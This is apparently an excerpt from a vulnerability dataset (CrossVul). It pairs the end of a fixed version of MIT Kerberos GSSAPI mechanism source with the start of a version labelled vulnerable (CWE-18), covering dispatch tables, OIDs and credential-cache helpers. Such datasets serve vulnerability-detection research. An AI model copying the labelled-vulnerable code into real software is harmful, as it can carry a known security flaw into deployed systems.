localname->value = gssalloc_strdup(lname);
localname->length = strlen(lname);
return (code == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
static OM_uint32 KRB5_CALLCONV
krb5_gss_authorize_localname(OM_uint32 *minor,
const gss_name_t pname,
gss_const_buffer_t local_user,
gss_const_OID name_type)
{
krb5_context context;
krb5_error_code code;
krb5_gss_name_t kname;
char *user;
int user_ok;
if (name_type != GSS_C_NO_OID &&
!g_OID_equal(name_type, GSS_C_NT_USER_NAME)) {
return GSS_S_BAD_NAMETYPE;
}
kname = (krb5_gss_name_t)pname;
code = krb5_gss_init_context(&context);
if (code != 0) {
*minor = code;
return GSS_S_FAILURE;
}
user = k5memdup0(local_user->value, local_user->length, &code);
if (user == NULL) {
*minor = code;
krb5_free_context(context);
return GSS_S_FAILURE;
}
user_ok = krb5_kuserok(context, kname->princ, user);
free(user);
krb5_free_context(context);
*minor = 0;
return user_ok ? GSS_S_COMPLETE : GSS_S_UNAUTHORIZED;
}
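/*
 * Method table for the native krb5 mechanism as consumed by the GSS mechglue;
 * operations this mechanism does not implement directly are left NULL.
 */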
static struct gss_config krb5_mechanism = {
{ GSS_MECH_KRB5_OID_LENGTH, GSS_MECH_KRB5_OID },
NULL,
krb5_gss_acquire_cred,
krb5_gss_release_cred,
krb5_gss_init_sec_context,
#ifdef LEAN_CLIENT
NULL,
#else
krb5_gss_accept_sec_context,
#endif
krb5_gss_process_context_token,
krb5_gss_delete_sec_context,
krb5_gss_context_time,
krb5_gss_get_mic,
krb5_gss_verify_mic,
#if defined(IOV_SHIM_EXERCISE_WRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
krb5_gss_wrap,
#endif
#if defined(IOV_SHIM_EXERCISE_UNWRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
krb5_gss_unwrap,
#endif
krb5_gss_display_status,
krb5_gss_indicate_mechs,
krb5_gss_compare_name,
krb5_gss_display_name,
krb5_gss_import_name,
krb5_gss_release_name,
krb5_gss_inquire_cred,
NULL, /* add_cred */
#ifdef LEAN_CLIENT
NULL,
NULL,
#else
krb5_gss_export_sec_context,
krb5_gss_import_sec_context,
#endif
krb5_gss_inquire_cred_by_mech,
krb5_gss_inquire_names_for_mech,
krb5_gss_inquire_context,
krb5_gss_internal_release_oid,
krb5_gss_wrap_size_limit,
krb5_gss_localname,
krb5_gss_authorize_localname,
krb5_gss_export_name,
krb5_gss_duplicate_name,
krb5_gss_store_cred,
krb5_gss_inquire_sec_context_by_oid,
krb5_gss_inquire_cred_by_oid,
krb5_gss_set_sec_context_option,
krb5_gssspi_set_cred_option,
krb5_gssspi_mech_invoke,
NULL, /* wrap_aead */
NULL, /* unwrap_aead */
krb5_gss_wrap_iov,
krb5_gss_unwrap_iov,
krb5_gss_wrap_iov_length,
NULL, /* complete_auth_token */
krb5_gss_acquire_cred_impersonate_name,
NULL, /* krb5_gss_add_cred_impersonate_name */
NULL, /* display_name_ext */
krb5_gss_inquire_name,
krb5_gss_get_name_attribute,
krb5_gss_set_name_attribute,
krb5_gss_delete_name_attribute,
krb5_gss_export_name_composite,
krb5_gss_map_name_to_any,
krb5_gss_release_any_name_mapping,
krb5_gss_pseudo_random,
NULL, /* set_neg_mechs */
krb5_gss_inquire_saslname_for_mech,
krb5_gss_inquire_mech_for_saslname,
krb5_gss_inquire_attrs_for_mech,
krb5_gss_acquire_cred_from,
krb5_gss_store_cred_into,
krb5_gss_acquire_cred_with_password,
krb5_gss_export_cred,
krb5_gss_import_cred,
NULL, /* import_sec_context_by_mech */
NULL, /* import_name_by_mech */
NULL, /* import_cred_by_mech */
krb5_gss_get_mic_iov,
krb5_gss_verify_mic_iov,
krb5_gss_get_mic_iov_length,
};
/* Functions which use security contexts or acquire creds are IAKERB-specific;
* other functions can borrow from the krb5 mech. */
static struct gss_config iakerb_mechanism = {
{ GSS_MECH_KRB5_OID_LENGTH, GSS_MECH_KRB5_OID },
NULL,
iakerb_gss_acquire_cred,
krb5_gss_release_cred,
iakerb_gss_init_sec_context,
#ifdef LEAN_CLIENT
NULL,
#else
iakerb_gss_accept_sec_context,
#endif
iakerb_gss_process_context_token,
iakerb_gss_delete_sec_context,
iakerb_gss_context_time,
iakerb_gss_get_mic,
iakerb_gss_verify_mic,
#if defined(IOV_SHIM_EXERCISE_WRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
iakerb_gss_wrap,
#endif
#if defined(IOV_SHIM_EXERCISE_UNWRAP) || defined(IOV_SHIM_EXERCISE)
NULL,
#else
iakerb_gss_unwrap,
#endif
krb5_gss_display_status,
krb5_gss_indicate_mechs,
krb5_gss_compare_name,
krb5_gss_display_name,
krb5_gss_import_name,
krb5_gss_release_name,
krb5_gss_inquire_cred,
NULL, /* add_cred */
#ifdef LEAN_CLIENT
NULL,
NULL,
#else
iakerb_gss_export_sec_context,
NULL,
#endif
krb5_gss_inquire_cred_by_mech,
krb5_gss_inquire_names_for_mech,
iakerb_gss_inquire_context,
krb5_gss_internal_release_oid,
iakerb_gss_wrap_size_limit,
krb5_gss_localname,
krb5_gss_authorize_localname,
krb5_gss_export_name,
krb5_gss_duplicate_name,
krb5_gss_store_cred,
iakerb_gss_inquire_sec_context_by_oid,
krb5_gss_inquire_cred_by_oid,
iakerb_gss_set_sec_context_option,
krb5_gssspi_set_cred_option,
krb5_gssspi_mech_invoke,
NULL, /* wrap_aead */
NULL, /* unwrap_aead */
iakerb_gss_wrap_iov,
iakerb_gss_unwrap_iov,
iakerb_gss_wrap_iov_length,
NULL, /* complete_auth_token */
NULL, /* acquire_cred_impersonate_name */
NULL, /* add_cred_impersonate_name */
NULL, /* display_name_ext */
krb5_gss_inquire_name,
krb5_gss_get_name_attribute,
krb5_gss_set_name_attribute,
krb5_gss_delete_name_attribute,
krb5_gss_export_name_composite,
krb5_gss_map_name_to_any,
krb5_gss_release_any_name_mapping,
iakerb_gss_pseudo_random,
NULL, /* set_neg_mechs */
krb5_gss_inquire_saslname_for_mech,
krb5_gss_inquire_mech_for_saslname,
krb5_gss_inquire_attrs_for_mech,
krb5_gss_acquire_cred_from,
krb5_gss_store_cred_into,
iakerb_gss_acquire_cred_with_password,
krb5_gss_export_cred,
krb5_gss_import_cred,
NULL, /* import_sec_context_by_mech */
NULL, /* import_name_by_mech */
NULL, /* import_cred_by_mech */
iakerb_gss_get_mic_iov,
iakerb_gss_verify_mic_iov,
iakerb_gss_get_mic_iov_length,
};
#ifdef _GSS_STATIC_LINK
#include "mglueP.h"
static int gss_iakerbmechglue_init(void)
{
struct gss_mech_config mech_iakerb;
memset(&mech_iakerb, 0, sizeof(mech_iakerb));
mech_iakerb.mech = &iakerb_mechanism;
mech_iakerb.mechNameStr = "iakerb";
mech_iakerb.mech_type = (gss_OID)gss_mech_iakerb;
gssint_register_mechinfo(&mech_iakerb);
return 0;
}
static int gss_krb5mechglue_init(void)
{
struct gss_mech_config mech_krb5;
memset(&mech_krb5, 0, sizeof(mech_krb5));
mech_krb5.mech = &krb5_mechanism;
mech_krb5.mechNameStr = "kerberos_v5";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5;
gssint_register_mechinfo(&mech_krb5);
mech_krb5.mechNameStr = "kerberos_v5_old";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5_old;
gssint_register_mechinfo(&mech_krb5);
mech_krb5.mechNameStr = "mskrb";
mech_krb5.mech_type = (gss_OID)gss_mech_krb5_wrong;
gssint_register_mechinfo(&mech_krb5);
return 0;
}
#else
MAKE_INIT_FUNCTION(gss_krb5int_lib_init);
MAKE_FINI_FUNCTION(gss_krb5int_lib_fini);
gss_mechanism KRB5_CALLCONV
gss_mech_initialize(void)
{
return &krb5_mechanism;
}
#endif /* _GSS_STATIC_LINK */
int gss_krb5int_lib_init(void)
{
int err;
#ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_init\n");
#endif
add_error_table(&et_k5g_error_table);
#ifndef LEAN_CLIENT
err = k5_mutex_finish_init(&gssint_krb5_keytab_lock);
if (err)
return err;
#endif /* LEAN_CLIENT */
err = k5_key_register(K5_KEY_GSS_KRB5_SET_CCACHE_OLD_NAME, free);
if (err)
return err;
err = k5_key_register(K5_KEY_GSS_KRB5_CCACHE_NAME, free);
if (err)
return err;
err = k5_key_register(K5_KEY_GSS_KRB5_ERROR_MESSAGE,
krb5_gss_delete_error_info);
if (err)
return err;
#ifndef _WIN32
err = k5_mutex_finish_init(&kg_kdc_flag_mutex);
if (err)
return err;
err = k5_mutex_finish_init(&kg_vdb.mutex);
if (err)
return err;
#endif
#ifdef _GSS_STATIC_LINK
err = gss_krb5mechglue_init();
if (err)
return err;
err = gss_iakerbmechglue_init();
if (err)
return err;
#endif
return 0;
}
void gss_krb5int_lib_fini(void)
{
#ifndef _GSS_STATIC_LINK
if (!INITIALIZER_RAN(gss_krb5int_lib_init) || PROGRAM_EXITING()) {
# ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_fini: skipping\n");
# endif
return;
}
#endif
#ifdef SHOW_INITFINI_FUNCS
printf("gss_krb5int_lib_fini\n");
#endif
remove_error_table(&et_k5g_error_table);
k5_key_delete(K5_KEY_GSS_KRB5_SET_CCACHE_OLD_NAME);
k5_key_delete(K5_KEY_GSS_KRB5_CCACHE_NAME);
k5_key_delete(K5_KEY_GSS_KRB5_ERROR_MESSAGE);
k5_mutex_destroy(&kg_vdb.mutex);
#ifndef _WIN32
k5_mutex_destroy(&kg_kdc_flag_mutex);
#endif
#ifndef LEAN_CLIENT
k5_mutex_destroy(&gssint_krb5_keytab_lock);
#endif /* LEAN_CLIENT */
}
#ifdef _GSS_STATIC_LINK
extern OM_uint32 gssint_lib_init(void);
#endif
OM_uint32 gss_krb5int_initialize_library (void)
{
#ifdef _GSS_STATIC_LINK
return gssint_mechglue_initialize_library();
#else
return CALL_INIT_FUNCTION(gss_krb5int_lib_init);
#endif
}
| ./CrossVul/dataset_final_sorted/CWE-18/c/good_1535_1 |
crossvul-cpp_data_bad_1535_1 | /* -*- mode: c; c-basic-offset: 4; indent-tabs-mode: nil -*- */
/*
* Copyright 1993 by OpenVision Technologies, Inc.
*
* Permission to use, copy, modify, distribute, and sell this software
* and its documentation for any purpose is hereby granted without fee,
* provided that the above copyright notice appears in all copies and
* that both that copyright notice and this permission notice appear in
* supporting documentation, and that the name of OpenVision not be used
* in advertising or publicity pertaining to distribution of the software
* without specific, written prior permission. OpenVision makes no
* representations about the suitability of this software for any
* purpose. It is provided "as is" without express or implied warranty.
*
* OPENVISION DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
* INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO
* EVENT SHALL OPENVISION BE LIABLE FOR ANY SPECIAL, INDIRECT OR
* CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF
* USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
* OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
* PERFORMANCE OF THIS SOFTWARE.
*/
/*
* Copyright (C) 1998 by the FundsXpress, INC.
*
* All rights reserved.
*
* Export of this software from the United States of America may require
* a specific license from the United States Government. It is the
* responsibility of any person or organization contemplating export to
* obtain such a license before exporting.
*
* WITHIN THAT CONSTRAINT, permission to use, copy, modify, and
* distribute this software and its documentation for any purpose and
* without fee is hereby granted, provided that the above copyright
* notice appear in all copies and that both that copyright notice and
* this permission notice appear in supporting documentation, and that
* the name of FundsXpress. not be used in advertising or publicity pertaining
* to distribution of the software without specific, written prior
* permission. FundsXpress makes no representations about the suitability of
* this software for any purpose. It is provided "as is" without express
* or implied warranty.
*
* THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
* WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR PURPOSE.
*/
/*
* Copyright (c) 2006-2008, Novell, Inc.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * The copyright holder's name is not used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
/*
* $Id$
*/
/* For declaration of krb5_ser_context_init */
#include "k5-int.h"
#include "gssapiP_krb5.h"
#include "mglueP.h"
#ifndef NO_PASSWORD
#include <pwd.h>
#endif
/** exported constants defined in gssapi_krb5{,_nx}.h **/
/* these are bogus, but will compile */
/*
* The OID of the draft krb5 mechanism, assigned by IETF, is:
* iso(1) org(3) dod(5) internet(1) security(5)
* kerberosv5(2) = 1.3.5.1.5.2
* The OID of the krb5_name type is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_name(1) = 1.2.840.113554.1.2.2.1
* The OID of the krb5_principal type is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_principal(2) = 1.2.840.113554.1.2.2.2
* The OID of the proposed standard krb5 mechanism is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) = 1.2.840.113554.1.2.2
* The OID of the proposed standard krb5 v2 mechanism is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5v2(3) = 1.2.840.113554.1.2.3
* Provisionally reserved for Kerberos session key algorithm
* identifiers is:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_enctype(4) = 1.2.840.113554.1.2.2.4
* Provisionally reserved for Kerberos mechanism-specific APIs:
* iso(1) member-body(2) US(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_gssapi_ext(5) = 1.2.840.113554.1.2.2.5
*/
/*
* Encoding rules: The first two values are encoded in one byte as 40
* * value1 + value2. Subsequent values are encoded base 128, most
* significant digit first, with the high bit (\200) set on all octets
* except the last in each value's encoding.
*/
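/*
 * Worked example of the rules above: for the krb5 mech OID 1.2.840.113554.1.2.2
 * the first octet is 40*1 + 2 = 42 = \052, 840 encodes as \206\110, 113554 as
 * \206\367\022, and the remaining arcs fit in one octet each (\001\002\002),
 * giving the 9-byte strings seen in krb5_gss_oid_array below.
 */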
#define NO_CI_FLAGS_X_OID_LENGTH 6
#define NO_CI_FLAGS_X_OID "\x2a\x85\x70\x2b\x0d\x1d"
const gss_OID_desc krb5_gss_oid_array[] = {
/* this is the official, rfc-specified OID */
{GSS_MECH_KRB5_OID_LENGTH, GSS_MECH_KRB5_OID},
/* this pre-RFC mech OID */
{GSS_MECH_KRB5_OLD_OID_LENGTH, GSS_MECH_KRB5_OLD_OID},
/* this is the unofficial, incorrect mech OID emitted by MS */
{GSS_MECH_KRB5_WRONG_OID_LENGTH, GSS_MECH_KRB5_WRONG_OID},
/* IAKERB OID */
{GSS_MECH_IAKERB_OID_LENGTH, GSS_MECH_IAKERB_OID},
/* this is the v2 assigned OID */
{9, "\052\206\110\206\367\022\001\002\003"},
/* these two are name type OID's */
/* 2.1.1. Kerberos Principal Name Form: (rfc 1964)
* This name form shall be represented by the Object Identifier {iso(1)
* member-body(2) United States(840) mit(113554) infosys(1) gssapi(2)
* krb5(2) krb5_name(1)}. The recommended symbolic name for this type
* is "GSS_KRB5_NT_PRINCIPAL_NAME". */
{10, "\052\206\110\206\367\022\001\002\002\001"},
/* gss_nt_krb5_principal. Object identifier for a krb5_principal. Do not use. */
{10, "\052\206\110\206\367\022\001\002\002\002"},
{NO_CI_FLAGS_X_OID_LENGTH, NO_CI_FLAGS_X_OID},
{ 0, 0 }
};
const gss_OID_desc * const gss_mech_krb5 = krb5_gss_oid_array+0;
const gss_OID_desc * const gss_mech_krb5_old = krb5_gss_oid_array+1;
const gss_OID_desc * const gss_mech_krb5_wrong = krb5_gss_oid_array+2;
const gss_OID_desc * const gss_mech_iakerb = krb5_gss_oid_array+3;
const gss_OID_desc * const gss_nt_krb5_name = krb5_gss_oid_array+5;
const gss_OID_desc * const gss_nt_krb5_principal = krb5_gss_oid_array+6;
const gss_OID_desc * const GSS_KRB5_NT_PRINCIPAL_NAME = krb5_gss_oid_array+5;
const gss_OID_desc * const GSS_KRB5_CRED_NO_CI_FLAGS_X = krb5_gss_oid_array+7;
static const gss_OID_set_desc oidsets[] = {
{1, (gss_OID) krb5_gss_oid_array+0}, /* RFC OID */
{1, (gss_OID) krb5_gss_oid_array+1}, /* pre-RFC OID */
{3, (gss_OID) krb5_gss_oid_array+0}, /* all names for krb5 mech */
{4, (gss_OID) krb5_gss_oid_array+0}, /* all krb5 names and IAKERB */
};
const gss_OID_set_desc * const gss_mech_set_krb5 = oidsets+0;
const gss_OID_set_desc * const gss_mech_set_krb5_old = oidsets+1;
const gss_OID_set_desc * const gss_mech_set_krb5_both = oidsets+2;
const gss_OID_set_desc * const kg_all_mechs = oidsets+3;
g_set kg_vdb = G_SET_INIT;
/** default credential support */
/*
* init_sec_context() will explicitly re-acquire default credentials,
* so handling the expiration/invalidation condition here isn't needed.
*/
OM_uint32
kg_get_defcred(minor_status, cred)
OM_uint32 *minor_status;
gss_cred_id_t *cred;
{
OM_uint32 major;
if ((major = krb5_gss_acquire_cred(minor_status,
(gss_name_t) NULL, GSS_C_INDEFINITE,
GSS_C_NULL_OID_SET, GSS_C_INITIATE,
cred, NULL, NULL)) && GSS_ERROR(major)) {
return(major);
}
*minor_status = 0;
return(GSS_S_COMPLETE);
}
OM_uint32
kg_sync_ccache_name (krb5_context context, OM_uint32 *minor_status)
{
OM_uint32 err = 0;
/*
* Sync up the context ccache name with the GSSAPI ccache name.
* If kg_ccache_name is NULL -- normal unless someone has called
* gss_krb5_ccache_name() -- then the system default ccache will
* be picked up and used by resetting the context default ccache.
* This is needed for platforms which support multiple ccaches.
*/
if (!err) {
/* if NULL, resets the context default ccache */
err = krb5_cc_set_default_name(context,
(char *) k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME));
}
*minor_status = err;
return (*minor_status == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
/* This function returns whether or not the caller set a ccache name. Used by
* gss_acquire_cred to figure out if the caller wants to only look at this
* ccache or search the cache collection for the desired name */
OM_uint32
kg_caller_provided_ccache_name (OM_uint32 *minor_status,
int *out_caller_provided_name)
{
if (out_caller_provided_name) {
*out_caller_provided_name =
(k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME) != NULL);
}
*minor_status = 0;
return GSS_S_COMPLETE;
}
OM_uint32
kg_get_ccache_name (OM_uint32 *minor_status, const char **out_name)
{
const char *name = NULL;
OM_uint32 err = 0;
char *kg_ccache_name;
kg_ccache_name = k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME);
if (kg_ccache_name != NULL) {
name = strdup(kg_ccache_name);
if (name == NULL)
err = ENOMEM;
} else {
krb5_context context = NULL;
/* Reset the context default ccache (see text above), and then
retrieve it. */
err = krb5_gss_init_context(&context);
if (!err)
err = krb5_cc_set_default_name (context, NULL);
if (!err) {
name = krb5_cc_default_name(context);
if (name) {
name = strdup(name);
if (name == NULL)
err = ENOMEM;
}
}
if (err && context)
save_error_info(err, context);
if (context)
krb5_free_context(context);
}
if (!err) {
if (out_name) {
*out_name = name;
}
}
*minor_status = err;
return (*minor_status == 0) ? GSS_S_COMPLETE : GSS_S_FAILURE;
}
OM_uint32
kg_set_ccache_name (OM_uint32 *minor_status, const char *name)
{
char *new_name = NULL;
char *swap = NULL;
char *kg_ccache_name;
krb5_error_code kerr;
if (name) {
new_name = strdup(name);
if (new_name == NULL) {
*minor_status = ENOMEM;
return GSS_S_FAILURE;
}
}
kg_ccache_name = k5_getspecific(K5_KEY_GSS_KRB5_CCACHE_NAME);
swap = kg_ccache_name;
kg_ccache_name = new_name;
new_name = swap;
kerr = k5_setspecific(K5_KEY_GSS_KRB5_CCACHE_NAME, kg_ccache_name);
if (kerr != 0) {
/* Can't store, so free up the storage. */
free(kg_ccache_name);
/* ??? free(new_name); */
*minor_status = kerr;
return GSS_S_FAILURE;
}
free (new_name);
*minor_status = 0;
return GSS_S_COMPLETE;
}
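/*
 * True if the OID o2 is a prefix of o1; the dispatch loops below use this so
 * that a caller-supplied OID may carry extra data appended to the base OID.
 */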
#define g_OID_prefix_equal(o1, o2) \
(((o1)->length >= (o2)->length) && \
(memcmp((o1)->elements, (o2)->elements, (o2)->length) == 0))
/*
* gss_inquire_sec_context_by_oid() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_ctx_id_t, const gss_OID, gss_buffer_set_t *);
} krb5_gss_inquire_sec_context_by_oid_ops[] = {
{
{GSS_KRB5_GET_TKT_FLAGS_OID_LENGTH, GSS_KRB5_GET_TKT_FLAGS_OID},
gss_krb5int_get_tkt_flags
},
{
{GSS_KRB5_EXTRACT_AUTHZ_DATA_FROM_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXTRACT_AUTHZ_DATA_FROM_SEC_CONTEXT_OID},
gss_krb5int_extract_authz_data_from_sec_context
},
{
{GSS_KRB5_INQ_SSPI_SESSION_KEY_OID_LENGTH, GSS_KRB5_INQ_SSPI_SESSION_KEY_OID},
gss_krb5int_inq_session_key
},
{
{GSS_KRB5_EXPORT_LUCID_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXPORT_LUCID_SEC_CONTEXT_OID},
gss_krb5int_export_lucid_sec_context
},
{
{GSS_KRB5_EXTRACT_AUTHTIME_FROM_SEC_CONTEXT_OID_LENGTH, GSS_KRB5_EXTRACT_AUTHTIME_FROM_SEC_CONTEXT_OID},
gss_krb5int_extract_authtime_from_sec_context
}
};
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_sec_context_by_oid (OM_uint32 *minor_status,
const gss_ctx_id_t context_handle,
const gss_OID desired_object,
gss_buffer_set_t *data_set)
{
krb5_gss_ctx_id_rec *ctx;
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (data_set == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*data_set = GSS_C_NO_BUFFER_SET;
ctx = (krb5_gss_ctx_id_rec *) context_handle;
if (ctx->terminated || !ctx->established)
return GSS_S_NO_CONTEXT;
for (i = 0; i < sizeof(krb5_gss_inquire_sec_context_by_oid_ops)/
sizeof(krb5_gss_inquire_sec_context_by_oid_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_inquire_sec_context_by_oid_ops[i].oid)) {
return (*krb5_gss_inquire_sec_context_by_oid_ops[i].func)(minor_status,
context_handle,
desired_object,
data_set);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gss_inquire_cred_by_oid() methods
*/
#if 0
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_cred_id_t, const gss_OID, gss_buffer_set_t *);
} krb5_gss_inquire_cred_by_oid_ops[] = {
};
#endif
static OM_uint32 KRB5_CALLCONV
krb5_gss_inquire_cred_by_oid(OM_uint32 *minor_status,
const gss_cred_id_t cred_handle,
const gss_OID desired_object,
gss_buffer_set_t *data_set)
{
OM_uint32 major_status = GSS_S_FAILURE;
#if 0
size_t i;
#endif
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (data_set == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*data_set = GSS_C_NO_BUFFER_SET;
if (cred_handle == GSS_C_NO_CREDENTIAL) {
*minor_status = (OM_uint32)KRB5_NOCREDS_SUPPLIED;
return GSS_S_NO_CRED;
}
major_status = krb5_gss_validate_cred(minor_status, cred_handle);
if (GSS_ERROR(major_status))
return major_status;
#if 0
for (i = 0; i < sizeof(krb5_gss_inquire_cred_by_oid_ops)/
sizeof(krb5_gss_inquire_cred_by_oid_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_inquire_cred_by_oid_ops[i].oid)) {
return (*krb5_gss_inquire_cred_by_oid_ops[i].func)(minor_status,
cred_handle,
desired_object,
data_set);
}
}
#endif
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gss_set_sec_context_option() methods
* (Disabled until we have something to populate the array.)
*/
#if 0
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, gss_ctx_id_t *, const gss_OID, const gss_buffer_t);
} krb5_gss_set_sec_context_option_ops[] = {
};
#endif
static OM_uint32 KRB5_CALLCONV
krb5_gss_set_sec_context_option (OM_uint32 *minor_status,
gss_ctx_id_t *context_handle,
const gss_OID desired_object,
const gss_buffer_t value)
{
#if 0
size_t i;
#endif
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (context_handle == NULL)
return GSS_S_CALL_INACCESSIBLE_READ;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
#if 0
for (i = 0; i < sizeof(krb5_gss_set_sec_context_option_ops)/
sizeof(krb5_gss_set_sec_context_option_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gss_set_sec_context_option_ops[i].oid)) {
return (*krb5_gss_set_sec_context_option_ops[i].func)(minor_status,
context_handle,
desired_object,
value);
}
}
#endif
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
static OM_uint32
no_ci_flags(OM_uint32 *minor_status,
gss_cred_id_t *cred_handle,
const gss_OID desired_oid,
const gss_buffer_t value)
{
krb5_gss_cred_id_t cred;
cred = (krb5_gss_cred_id_t) *cred_handle;
cred->suppress_ci_flags = 1;
*minor_status = 0;
return GSS_S_COMPLETE;
}
/*
* gssspi_set_cred_option() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, gss_cred_id_t *, const gss_OID, const gss_buffer_t);
} krb5_gssspi_set_cred_option_ops[] = {
{
{GSS_KRB5_COPY_CCACHE_OID_LENGTH, GSS_KRB5_COPY_CCACHE_OID},
gss_krb5int_copy_ccache
},
{
{GSS_KRB5_SET_ALLOWABLE_ENCTYPES_OID_LENGTH, GSS_KRB5_SET_ALLOWABLE_ENCTYPES_OID},
gss_krb5int_set_allowable_enctypes
},
{
{GSS_KRB5_SET_CRED_RCACHE_OID_LENGTH, GSS_KRB5_SET_CRED_RCACHE_OID},
gss_krb5int_set_cred_rcache
},
{
{GSS_KRB5_IMPORT_CRED_OID_LENGTH, GSS_KRB5_IMPORT_CRED_OID},
gss_krb5int_import_cred
},
{
{NO_CI_FLAGS_X_OID_LENGTH, NO_CI_FLAGS_X_OID},
no_ci_flags
},
};
static OM_uint32 KRB5_CALLCONV
krb5_gssspi_set_cred_option(OM_uint32 *minor_status,
gss_cred_id_t *cred_handle,
const gss_OID desired_object,
const gss_buffer_t value)
{
OM_uint32 major_status = GSS_S_FAILURE;
size_t i;
if (minor_status == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
if (cred_handle == NULL)
return GSS_S_CALL_INACCESSIBLE_WRITE;
*minor_status = 0;
if (desired_object == GSS_C_NO_OID)
return GSS_S_CALL_INACCESSIBLE_READ;
if (*cred_handle != GSS_C_NO_CREDENTIAL) {
major_status = krb5_gss_validate_cred(minor_status, *cred_handle);
if (GSS_ERROR(major_status))
return major_status;
}
for (i = 0; i < sizeof(krb5_gssspi_set_cred_option_ops)/
sizeof(krb5_gssspi_set_cred_option_ops[0]); i++) {
if (g_OID_prefix_equal(desired_object, &krb5_gssspi_set_cred_option_ops[i].oid)) {
return (*krb5_gssspi_set_cred_option_ops[i].func)(minor_status,
cred_handle,
desired_object,
value);
}
}
*minor_status = EINVAL;
return GSS_S_UNAVAILABLE;
}
/*
* gssspi_mech_invoke() methods
*/
static struct {
gss_OID_desc oid;
OM_uint32 (*func)(OM_uint32 *, const gss_OID, const gss_OID, gss_buffer_t);
} krb5_gssspi_mech_invoke_ops[] = {
{
{GSS_KRB5_REGISTER_ACCEPTOR_IDENTITY_OID_LENGTH, GSS_KRB5_REGISTER_ACCEPTOR_IDENTITY_OID},
gss_krb5int_register_acceptor_identity
},
{
{GSS_KRB5_CCACHE_NAME_OID_LENGTH, GSS_KRB5_CCACHE_NAME_OID},
gss_krb5int_ccache_name
},
{
